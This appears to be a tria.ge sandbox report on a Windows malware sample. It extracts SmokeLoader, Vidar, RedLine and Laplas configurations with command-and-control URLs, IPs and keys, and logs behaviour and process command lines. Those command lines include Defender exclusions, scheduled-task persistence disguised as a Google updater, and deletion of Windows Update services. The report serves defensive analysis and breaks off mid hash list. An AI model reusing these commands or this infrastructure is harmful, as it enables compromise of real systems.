Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
95s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
12/04/2023, 01:43
Static task
static1
Behavioral task
behavioral1
Sample
10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe
Resource
win10v2004-20230220-en
General
-
Target
10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe
-
Size
196KB
-
MD5
29fec1cacff20e1697d9fc3347841d9c
-
SHA1
6d5304c9243553fa1f8c12a04528a8e924afefa9
-
SHA256
10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4
-
SHA512
252849e48dd241d16432b85d442c1ea8925f9c2601361996b8e391a90780b71222cee262153f7dcd170feaaa68c3ae9d0a47e7f9c6ccd22b2a78bd434f3fe130
-
SSDEEP
3072:GW28cPNh3QNGTQOXDjsKWQB0K/js5DOFfgxPZaSkLrkGrGib:L28uMqQO8HARkOFfy7k0Ja
Malware Config
Extracted
smokeloader
sprg
Extracted
smokeloader
2022
http://hoh0aeghwugh2gie.com/
http://hie7doodohpae4na.com/
http://aek0aicifaloh1yo.com/
http://yic0oosaeiy7ahng.com/
http://wa5zu7sekai8xeih.com/
Extracted
vidar
3.4
e749025c61b2caca10aa829a9e1a65a1
https://steamcommunity.com/profiles/76561199494593681
https://t.me/auftriebs
-
profile_id_v2
e749025c61b2caca10aa829a9e1a65a1
-
user_agent
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Extracted
redline
build03
65.21.3.192:32845
-
auth_value
688766d7eb9d4a5fde1dec6cdf7c3d9e
Extracted
laplas
http://185.106.92.74
-
api_key
bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4924 created 3236 4924 Tzairumea840.exe 42 -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation F785.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation E043.exe Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation 09487942395356987957.exe -
Executes dropped EXE 7 IoCs
pid Process 3040 E043.exe 4668 F785.exe 524 46997604058517522986.exe 4608 09487942395356987957.exe 1788 svcservice.exe 4924 Tzairumea840.exe 4060 F785.exe -
Loads dropped DLL 2 IoCs
pid Process 3040 E043.exe 3040 E043.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0006000000023152-284.dat upx behavioral2/files/0x0006000000023152-288.dat upx behavioral2/files/0x0006000000023152-289.dat upx behavioral2/memory/524-294-0x0000000000870000-0x00000000016D3000-memory.dmp upx behavioral2/memory/524-297-0x0000000000870000-0x00000000016D3000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\telemetry = "C:\\Users\\Admin\\AppData\\Roaming\\telemetry\\svcservice.exe" 09487942395356987957.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xrdsu = "\"C:\\Users\\Admin\\AppData\\Roaming\\Ygpxl\\Xrdsu.exe\"" F785.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 4608 09487942395356987957.exe 4608 09487942395356987957.exe 1788 svcservice.exe 1788 svcservice.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4668 set thread context of 4060 4668 F785.exe 117 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3048 sc.exe 2712 sc.exe 2660 sc.exe 4604 sc.exe 4936 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2780 3040 WerFault.exe 90 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString E043.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 E043.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4048 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4704 10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe 4704 10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3236 Explorer.EXE -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 4704 10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE 3236 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4668 F785.exe Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeDebugPrivilege 2484 powershell.exe Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeShutdownPrivilege 3236 Explorer.EXE Token: SeCreatePagefilePrivilege 3236 Explorer.EXE Token: SeDebugPrivilege 3044 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3236 wrote to memory of 3040 3236 Explorer.EXE 90 PID 3236 wrote to memory of 3040 3236 Explorer.EXE 90 PID 3236 wrote to memory of 3040 3236 Explorer.EXE 90 PID 3236 wrote to memory of 4668 3236 Explorer.EXE 92 PID 3236 wrote to memory of 4668 3236 Explorer.EXE 92 PID 3236 wrote to memory of 4668 3236 Explorer.EXE 92 PID 3236 wrote to memory of 888 3236 Explorer.EXE 93 PID 3236 wrote to memory of 888 3236 Explorer.EXE 93 PID 3236 wrote to memory of 888 3236 Explorer.EXE 93 PID 3236 wrote to memory of 888 3236 Explorer.EXE 93 PID 3236 wrote to memory of 1252 3236 Explorer.EXE 94 PID 3236 wrote to memory of 1252 3236 Explorer.EXE 94 PID 3236 wrote to memory of 1252 3236 Explorer.EXE 94 PID 3236 wrote to memory of 1604 3236 Explorer.EXE 95 PID 3236 wrote to memory of 1604 3236 Explorer.EXE 95 PID 3236 wrote to memory of 1604 3236 Explorer.EXE 95 PID 3236 wrote to memory of 1604 3236 Explorer.EXE 95 PID 3236 wrote to memory of 3700 3236 Explorer.EXE 96 PID 3236 wrote to memory of 3700 3236 Explorer.EXE 96 PID 3236 wrote to memory of 3700 3236 Explorer.EXE 96 PID 4668 wrote to memory of 2484 4668 F785.exe 97 PID 4668 wrote to memory of 2484 4668 F785.exe 97 PID 4668 wrote to memory of 2484 4668 F785.exe 97 PID 3236 wrote to memory of 4284 3236 Explorer.EXE 99 PID 3236 wrote to memory of 4284 3236 Explorer.EXE 99 PID 3236 wrote to memory of 4284 3236 Explorer.EXE 99 PID 3236 wrote to memory of 4284 3236 Explorer.EXE 99 PID 3236 wrote to memory of 4716 3236 Explorer.EXE 100 PID 3236 wrote to memory of 4716 3236 Explorer.EXE 100 PID 3236 wrote to memory of 4716 3236 Explorer.EXE 100 PID 3236 wrote to memory of 4716 3236 Explorer.EXE 100 PID 3236 wrote to memory of 952 3236 Explorer.EXE 101 PID 3236 wrote to memory of 952 3236 Explorer.EXE 101 PID 3236 wrote to memory of 952 3236 Explorer.EXE 101 PID 3236 wrote to memory of 952 3236 Explorer.EXE 101 PID 3040 wrote to memory of 524 3040 E043.exe 102 PID 3040 wrote to memory of 524 3040 E043.exe 102 PID 3236 wrote to memory of 2864 3236 Explorer.EXE 104 PID 3236 wrote to memory of 2864 3236 Explorer.EXE 104 PID 3236 wrote to memory of 2864 3236 Explorer.EXE 104 PID 3236 wrote to memory of 4408 3236 Explorer.EXE 105 PID 3236 wrote to memory of 4408 3236 Explorer.EXE 105 PID 3236 wrote to memory of 4408 3236 Explorer.EXE 105 PID 3236 wrote to memory of 4408 3236 Explorer.EXE 105 PID 524 wrote to memory of 4616 524 46997604058517522986.exe 107 PID 524 wrote to memory of 4616 524 46997604058517522986.exe 107 PID 4616 wrote to memory of 2648 4616 cmd.exe 108 PID 4616 wrote to memory of 2648 4616 cmd.exe 108 PID 3040 wrote to memory of 4608 3040 E043.exe 109 PID 3040 wrote to memory of 4608 3040 E043.exe 109 PID 3040 wrote to memory of 4608 3040 E043.exe 109 PID 3040 wrote to memory of 2072 3040 E043.exe 110 PID 3040 wrote to memory of 2072 3040 E043.exe 110 PID 3040 wrote to memory of 2072 3040 E043.exe 110 PID 2072 wrote to memory of 4048 2072 cmd.exe 113 PID 2072 wrote to memory of 4048 2072 cmd.exe 113 PID 2072 wrote to memory of 4048 2072 cmd.exe 113 PID 4608 wrote to memory of 1788 4608 09487942395356987957.exe 115 PID 4608 wrote to memory of 1788 4608 09487942395356987957.exe 115 PID 4608 wrote to memory of 1788 4608 09487942395356987957.exe 115 PID 4668 wrote to memory of 4924 4668 F785.exe 116 PID 4668 wrote to memory of 4924 4668 F785.exe 116 PID 4668 wrote to memory of 4060 4668 F785.exe 117 PID 4668 wrote to memory of 4060 4668 F785.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe"C:\Users\Admin\AppData\Local\Temp\10f3989e8fa0f2b29e1aabdc9f2b6d8112217c3c34409837f3fe4ae5f2b0f9c4.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4704
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\E043.exeC:\Users\Admin\AppData\Local\Temp\E043.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\ProgramData\46997604058517522986.exe"C:\ProgramData\46997604058517522986.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\46997604058517522986.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵PID:2648
-
-
-
-
C:\ProgramData\09487942395356987957.exe"C:\ProgramData\09487942395356987957.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4608 -
C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E043.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4048
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 19203⤵
- Program crash
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\F785.exeC:\Users\Admin\AppData\Local\Temp\F785.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"C:\Users\Admin\AppData\Local\Temp\Tzairumea840.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:4924
-
-
C:\Users\Admin\AppData\Local\Temp\F785.exeC:\Users\Admin\AppData\Local\Temp\F785.exe3⤵
- Executes dropped EXE
PID:4060
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:888
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1252
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1604
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3700
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4284
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4716
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:952
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2864
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3876
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:4952
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:5024
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1264
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mmwusnu#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵PID:1864
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:464
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2712
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2660
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4604
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4624
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4920
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:868
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4344
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:4964
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yqhkxrl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵PID:2980
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:4084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:1228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3040 -ip 30401⤵PID:5112
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:4180
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD558fe5c1f5bb97d2ab8c07d9b2165d291
SHA17fa1fd096e3e299a1d12620afb5f0e8bbac501fc
SHA2569ec7b6c726d9cafca8ab233f83133e06adf5a8af6898197ffc7c5ef54b402694
SHA512ee7532ef1d4903eb4a6fddca47774358a67904ec49cbc700a2161c9f1f372bd02679fbeb4bada5cb6d940946084b080f7bbc138d4a8202fdbed5b9a8bc377e01
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
7.2MB
MD5c5e0fb4ecaa8a7481a283099d604f7a0
SHA1df4b0c0cc823da2b0443076650c292b43dd9de33
SHA256c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42
SHA512375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
4.3MB
MD5c4ab3149ef02a36d663699a8c541933e
SHA167088f5eff9ec575775b711c9e3650d12d7f4d5c
SHA2560a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce
SHA51288b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2KB
MD5f39d3c5975feb9c06ef0604241d49f4c
SHA10a4b0cbff8372154e2ee23df5f38b2a4917ff737
SHA2564407818257d34e1aeb8ca1676a2281652617ff96a28a3739d5564951f3975ccf
SHA512e516a03b4eebb84e134da53d567ca962a9b7d9039d34d4aead4bcabbc7c2a25fc3a5da50cd945bf9a7f88c445dd50298f6b25179feb99bccb8009fc7e4cc744a
-
Filesize
1KB
MD513b08803e0bb671919478d178f19d6e2
SHA19f8c1d2a16446f9ee1e3244f48d372aecccf4dd9
SHA256bab001392f6a9fc257a302cf557c9f571c7b352f41aedda14b049976ee5fd1c9
SHA5122fe208b9958329734a5c6ce6aa526ee20d2c02d351927e75f85f27c2ffdc3c9e3413c17dc6e0dd9eefc3fb379e936b6bef2984a6e44ffafdc7600f590398016f
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD51bc0d74087948dd1b720edbb049df4a6
SHA16c013cc1d6b985015b8f98c6d80d36b8a7f855a1
SHA2563b723e3178cf3d61ba90da0fb8d7be5c1d807cf53d87e246ad1f115e54c28685
SHA5123bcabf68363b66e15cdc535055cab5743c9dd058d39e6024daf449cd94c2153c02bef06a88589614f4a1ad0e898a7902f9eac701f0c15b9a9411b84d3f27138e
-
Filesize
944B
MD5a6685e02d4224799097fe9c6627fb607
SHA1ec2d18e25513a559eed359a82c0d99e81ff41d54
SHA256a5090285f71bb4d53010b60b446726b9257b54271c6f2e7d708ec78e335e15a9
SHA5125e3111b2bcd3020d00d793ae3df269737ac3648d6374e18629860c455a023700f53effbc31bd3d6b5f359811de0f51a38eda248e5fd652675e6337b18cf2969e
-
Filesize
1KB
MD558f473558345c4d2feab48d4999b148a
SHA1a58fec1ddadb3cb692cd1bac3d21d09592ec58ee
SHA25669496654c76a65ba517bb7ee3bacb598a1e778aa7ee7807bf7318087d8d39d22
SHA512f19f50701c05d050fa114e29544e77ce620c4f05619262781eb5a12906f3e4a0219d79ea574e2ace3bdad8c25346f2dad71e9768f64361321e9299061b7b87d0
-
Filesize
322KB
MD53264a6e51f9d609ef286a7f581517715
SHA1f9bb7a1f54635b4c04ae37b713b66d9de290409d
SHA2564c84138f8d3657891efb9be5c4c42028dce408b9150db82bc9d0beffb7f881f3
SHA512b9dae3edee94a54998a2fcf85e3eab83f6b91c53a8f43c7898cc8a9744bbf90cbc4c7c9f4028c65a1ecf18cc4644cb56cbb1095a29df048635724eb1420adbf5
-
Filesize
322KB
MD53264a6e51f9d609ef286a7f581517715
SHA1f9bb7a1f54635b4c04ae37b713b66d9de290409d
SHA2564c84138f8d3657891efb9be5c4c42028dce408b9150db82bc9d0beffb7f881f3
SHA512b9dae3edee94a54998a2fcf85e3eab83f6b91c53a8f43c7898cc8a9744bbf90cbc4c7c9f4028c65a1ecf18cc4644cb56cbb1095a29df048635724eb1420adbf5
-
Filesize
1.4MB
MD504a05e3080aba5e333c816493ef2635d
SHA128d558491a0756f871b986130f0e7f86639877a2
